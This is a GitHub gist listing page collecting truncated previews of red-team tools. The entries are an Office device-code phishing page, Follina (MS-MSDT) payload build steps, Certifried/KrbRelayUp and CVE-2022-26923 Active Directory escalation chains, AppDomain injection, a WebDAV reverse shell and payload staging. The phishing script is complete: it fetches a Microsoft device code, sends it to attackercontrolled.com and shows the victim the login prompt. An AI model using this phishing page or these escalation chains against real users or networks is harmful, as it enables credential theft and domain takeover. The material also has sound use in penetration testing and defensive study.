
Steve Borosh rvrsh3ll

@rvrsh3ll
rvrsh3ll / S3UpDown.ps1
Created August 21, 2022 15:23 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
# Upload
&{
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
rvrsh3ll / generate.html
Created August 1, 2022 01:03 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
rvrsh3ll / FindingComputersWithLocalAdmin.md
Created June 29, 2022 15:59 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful Cypher queries to find computers that are local admin on other computers, or to find groups containing both users and computers.

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

rvrsh3ll / fxstmp.cs
Created June 1, 2022 19:46 — forked from code-scrap/fxstmp.cs
FXSTMP AppDomain Injection. - FXSTHIS!
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
rvrsh3ll / ms-msdt.MD
Created May 30, 2022 15:24 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
rvrsh3ll / certifried_with_krbrelayup.md
Created May 17, 2022 01:16 — forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. The combination of these two: a non-privileged domain user escalating to Domain Admin without the requirement of adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

rvrsh3ll / Program.cs
Created May 12, 2022 11:45 — forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relevant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
rvrsh3ll / JEWebDav.ps1
Created May 10, 2022 16:20 — forked from darkquasar/JEWebDav.ps1
Simple WebDav Server in Powershell
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>
<#
.SYNOPSIS
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
rvrsh3ll / PowerView-3.0-tricks.ps1
Created March 4, 2022 15:28 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
rvrsh3ll / payloads-to-s3.sh
Created February 26, 2022 16:38 — forked from tonykarre/payloads-to-s3.sh
Dynamically create S3 buckets to stage pen test tools/payloads. Files can only be downloaded by the target.
#! /bin/bash
# Tony Karre
# @tonykarre
#
# payloads-to-s3.sh
#
# Use case:
#
# You are executing a pen test, and you want to temporarily stage payloads and other tools
# on a server outside of your own infrastructure. You also want to make sure that